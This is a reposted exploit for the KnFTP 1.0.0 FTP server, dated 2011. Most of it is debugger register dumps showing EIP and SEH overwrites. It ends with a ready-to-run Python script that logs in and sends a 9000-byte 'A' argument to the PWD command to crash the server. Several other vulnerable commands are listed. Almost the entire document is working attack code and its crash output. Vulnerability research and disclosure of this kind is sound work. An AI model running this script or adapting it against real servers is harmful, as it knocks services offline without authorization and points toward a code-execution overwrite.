KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)
Source: vfocus.net  Author: loneferret  Published: 2011-09-19

#!/usr/bin/python

# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/

# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
 
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwritten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDD000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


import socket

# Overlong argument. The register dumps above are what 9000 bytes of 0x41
# produce on Windows XP SP2/SP3 with DEP off; any of the listed commands
# (MKD / LS / ABOR / CD / APPE / REST / PWD) can be sent in place of PWD.
buffer = b"\x41" * 9000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx', 21))   # target KnFTP server
s.recv(1024)                         # banner
s.send(b'USER test\r\n')
s.recv(1024)
s.send(b'PASS test\r\n')
s.recv(1024)
# PWD takes no argument in RFC 959; the server overflows on one regardless.
s.send(b'PWD ' + buffer + b'\r\n')
s.recv(1024)                         # fails with a reset once the server has crashed
s.send(b'QUIT\r\n')
s.close()